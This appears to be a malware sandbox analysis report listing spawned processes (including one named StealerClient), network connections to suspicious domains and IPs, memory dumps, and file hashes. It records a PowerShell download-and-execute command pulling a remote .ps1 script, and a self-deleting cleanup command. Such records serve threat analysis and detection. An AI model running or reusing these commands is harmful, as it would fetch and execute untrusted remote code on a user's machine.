C:\Users\Admin\AppData\Local\Temp\Files\niceeyestrain.exe
"C:\Users\Admin\AppData\Local\Temp\Files\niceeyestrain.exe"
C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_3.exe
"C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_3.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"
C:\Users\Admin\AppData\Local\Temp\BBLb.exe
"C:\Users\Admin\AppData\Local\Temp\BBLb.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2964 -ip 2964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 448
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2964 -ip 2964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 444
C:\Users\Admin\AppData\Local\Temp\Files\osminogs.exe
"C:\Users\Admin\AppData\Local\Temp\Files\osminogs.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Amdau.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Amdau.exe"
C:\Users\Admin\AppData\Local\Temp\Files\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\Files\sqlcmd.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://houssagynecologue.com/assets/js/debug2.ps1')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://houssagynecologue.com/assets/js/debug2.ps1')
C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
"C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
C:\Users\Admin\AppData\Local\Temp\BBLb.exe
C:\Users\Admin\AppData\Local\Temp\BBLb.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\Files\sqlcmd.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe"
C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
C:\Users\Admin\AppData\Local\Temp\Files\teamviewer.exe
"C:\Users\Admin\AppData\Local\Temp\Files\teamviewer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | power.poisontoolz.com | udp |
| US | 172.67.162.192:80 | power.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.162.67.172.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 193.233.132.73:80 | 193.233.132.73 | tcp |
| US | 8.8.8.8:53 | 73.132.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| CN | 175.24.197.196:80 | tcp | |
| FI | 135.181.121.233:1451 | tcp | |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.110.16.96.in-addr.arpa | udp |
| DE | 159.89.100.67:7000 | tcp | |
| US | 8.8.8.8:53 | 67.100.89.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lastimaners.ug | udp |
| RU | 91.215.85.223:80 | lastimaners.ug | tcp |
| US | 8.8.8.8:53 | 223.85.215.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | growrock.co.za | udp |
| ZA | 196.22.132.220:443 | growrock.co.za | tcp |
| US | 8.8.8.8:53 | 220.132.22.196.in-addr.arpa | udp |
| NL | 195.20.16.46:80 | 195.20.16.46 | tcp |
| US | 8.8.8.8:53 | files.catbox.moe | udp |
| US | 8.8.8.8:53 | 46.16.20.195.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| DE | 185.172.128.154:80 | 185.172.128.154 | tcp |
| US | 8.8.8.8:53 | 35.20.181.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.128.172.185.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | m2reg.ulm.ac.id | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| ID | 103.23.232.80:80 | m2reg.ulm.ac.id | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 80.232.23.103.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| FI | 135.181.121.233:1451 | tcp | |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | artmediastudio.ro | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| RO | 176.126.201.5:80 | artmediastudio.ro | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 5.201.126.176.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | houssagynecologue.com | udp |
| US | 169.60.78.87:443 | houssagynecologue.com | tcp |
| US | 8.8.8.8:53 | resergvearyinitiani.shop | udp |
| US | 104.21.94.2:443 | resergvearyinitiani.shop | tcp |
| US | 8.8.8.8:53 | 87.78.60.169.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | antiuncontemporary.fun | udp |
| US | 8.8.8.8:53 | reechoingkaolizationp.fun | udp |
| US | 8.8.8.8:53 | mazumaponyanthus.fun | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | unexaminablespectrall.fun | udp |
| DE | 185.172.128.8:80 | 185.172.128.8 | tcp |
| US | 8.8.8.8:53 | muggierdragstemmio.fun | udp |
| US | 8.8.8.8:53 | bicyclesunhygenico.fun | udp |
| US | 8.8.8.8:53 | pielumchalotpostwo.fun | udp |
| US | 8.8.8.8:53 | fishboatnurrybeauti.fun | udp |
| US | 8.8.8.8:53 | 2.94.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.128.172.185.in-addr.arpa | udp |
| US | 169.60.78.87:443 | houssagynecologue.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | smpn41.semarangkota.go.id | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| ID | 103.101.52.6:443 | smpn41.semarangkota.go.id | tcp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 169.60.78.87:443 | houssagynecologue.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 6.52.101.103.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| CZ | 62.233.57.95:80 | tcp | |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | transfer.sh | udp |
| DE | 144.76.136.153:443 | transfer.sh | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | ecoproducts.com.my | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 153.136.76.144.in-addr.arpa | udp |
| US | 104.21.8.164:443 | ecoproducts.com.my | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | starozitnictvi-znojmo.cz | udp |
| CZ | 62.109.150.108:80 | starozitnictvi-znojmo.cz | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 164.8.21.104.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| RU | 95.143.190.57:15647 | tcp | |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 216.98.9.109:80 | 216.98.9.109 | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 109.9.98.216.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| RU | 45.9.74.182:80 | tcp | |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.34.170:443 | pastebin.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 170.34.67.172.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| DE | 159.89.100.67:7000 | tcp | |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 202.178.17.96.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | recessionconceptjetwe.pw | udp |
| US | 8.8.8.8:53 | goddirtybrilliancece.fun | udp |
| US | 8.8.8.8:53 | blastechohackopeower.pw | udp |
| US | 8.8.8.8:53 | playerweighmailydailew.pw | udp |
| US | 8.8.8.8:53 | carstirgapcheatdeposwte.pw | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| FI | 135.181.121.233:1451 | tcp | |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| RU | 193.233.132.167:80 | 193.233.132.167 | tcp |
| US | 8.8.8.8:53 | 3.121.82.140.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 167.132.233.193.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| DE | 185.172.128.113:80 | 185.172.128.113 | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 113.128.172.185.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| DE | 144.76.1.85:18574 | tcp | |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 1717.1000uc.com | udp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| GB | 79.133.176.211:80 | 1717.1000uc.com | tcp |
| US | 8.8.8.8:53 | store2.gofile.io | udp |
| FR | 31.14.70.243:443 | store2.gofile.io | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 85.1.76.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.29.80.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.176.133.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 243.70.14.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.137.159.162.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| NL | 195.20.16.46:80 | 195.20.16.46 | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | 1717mu.1000uc.com | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | store10.gofile.io | udp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| GB | 79.133.176.213:80 | 1717mu.1000uc.com | tcp |
| US | 8.8.8.8:53 | jq.727mu.com | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| CN | 153.99.234.44:33446 | jq.727mu.com | tcp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 252.70.14.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.176.133.79.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | stdown.dinju.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| CN | 113.194.51.118:80 | stdown.dinju.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| FI | 135.181.121.233:1451 | tcp | |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| DE | 185.172.128.11:80 | 185.172.128.11 | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 11.128.172.185.in-addr.arpa | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | fr-zephyr.miningocean.org | udp |
| FR | 141.94.115.174:5342 | fr-zephyr.miningocean.org | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 174.115.94.141.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| CN | 123.6.40.127:80 | stdown.dinju.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| RU | 95.143.190.57:15647 | tcp | |
| FI | 135.181.121.233:1451 | tcp | |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| CN | 123.6.40.204:80 | stdown.dinju.com | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| FI | 135.181.121.233:1451 | tcp | |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
Files
memory/1608-0-0x0000000000740000-0x0000000000748000-memory.dmp
memory/1608-1-0x00000000745E0000-0x0000000074D90000-memory.dmp
memory/1608-2-0x00000000050D0000-0x000000000516C000-memory.dmp
memory/1608-3-0x0000000005240000-0x0000000005250000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\app1.exe
| MD5 | 86443efb8ee2289340119b5e84aad4f1 |
| SHA1 | e8b2d4cc5fcebbfe798283431073e0b78ba80f4e |
| SHA256 | 4d64bbdbca232e9efbf8770386ed39562691793c678856d6e0c0fb1dc4af5219 |
| SHA512 | 73a04ff02aaacfce3d750bb033b1213932df72f9877b014aefdb0eefc751a840f30b3e21095f90644c1d448b6da1bab7e53009053c1db5c54d57256646a1e0c5 |
C:\Users\Admin\AppData\Local\Temp\Files\ss_conn_service.exe
| MD5 | 4fd20b83f785393e13bf3734fb9ed52f |
| SHA1 | f54a3597ec715dfab41d04f8625c343546c12e3d |
| SHA256 | 560aba847a47f07ccaaeded06dd799b134ef537d3b5239ae60df9c340d60ee33 |
| SHA512 | ec9d6fbf2327278a8fd332283b1054ae8537217f441c15863eda7ce2c9e6e2323698772d7df19c4d330b224138bdd9c80937f37dd757dd00d8dc4aa14a2ebe7e |
memory/4132-23-0x000001F340F00000-0x000001F340F0D000-memory.dmp
memory/4132-25-0x000001F340FE0000-0x000001F340FEE000-memory.dmp
memory/4132-26-0x00007FFAACD20000-0x00007FFAAD7E1000-memory.dmp
memory/4132-27-0x000001F35B1E0000-0x000001F35B1F0000-memory.dmp
memory/4132-28-0x000001F35B1E0000-0x000001F35B1F0000-memory.dmp
memory/4132-29-0x000001F35B1E0000-0x000001F35B1F0000-memory.dmp
memory/4132-30-0x00007FF66FFF0000-0x00007FF670034000-memory.dmp
memory/2108-31-0x0000000002190000-0x00000000021B3000-memory.dmp
memory/1608-33-0x00000000745E0000-0x0000000074D90000-memory.dmp
memory/1608-34-0x0000000005240000-0x0000000005250000-memory.dmp
memory/2108-35-0x00000000745E0000-0x0000000074D90000-memory.dmp
memory/2108-36-0x0000000004DC0000-0x0000000004E14000-memory.dmp
memory/2108-37-0x0000000004EB0000-0x0000000004EC0000-memory.dmp
memory/2108-38-0x0000000004EB0000-0x0000000004EC0000-memory.dmp
memory/2108-39-0x0000000004EC0000-0x0000000005464000-memory.dmp
memory/2108-40-0x0000000005470000-0x0000000005502000-memory.dmp
memory/4132-41-0x00007FFAACD20000-0x00007FFAAD7E1000-memory.dmp
memory/2108-42-0x00000000056B0000-0x00000000056BA000-memory.dmp
memory/2108-43-0x0000000005830000-0x0000000005E48000-memory.dmp
memory/2108-44-0x0000000005F60000-0x000000000606A000-memory.dmp
memory/2108-46-0x0000000005790000-0x00000000057CC000-memory.dmp
memory/2108-45-0x0000000005770000-0x0000000005782000-memory.dmp
memory/2108-47-0x0000000005E70000-0x0000000005EBC000-memory.dmp
memory/4132-48-0x000001F35B1E0000-0x000001F35B1F0000-memory.dmp
memory/4132-49-0x000001F35B1E0000-0x000001F35B1F0000-memory.dmp
memory/4132-50-0x000001F35B1E0000-0x000001F35B1F0000-memory.dmp
memory/2108-52-0x00000000745E0000-0x0000000074D90000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
| MD5 | 1a917a85dcbb1d3df5f4dd02e3a62873 |
| SHA1 | 567f528fec8e7a4787f8c253446d8f1b620dc9d6 |
| SHA256 | 217fbf967c95d1359314fcd53ae8d04489eb3c7bdc1f22110d5a8a476d1fc92e |
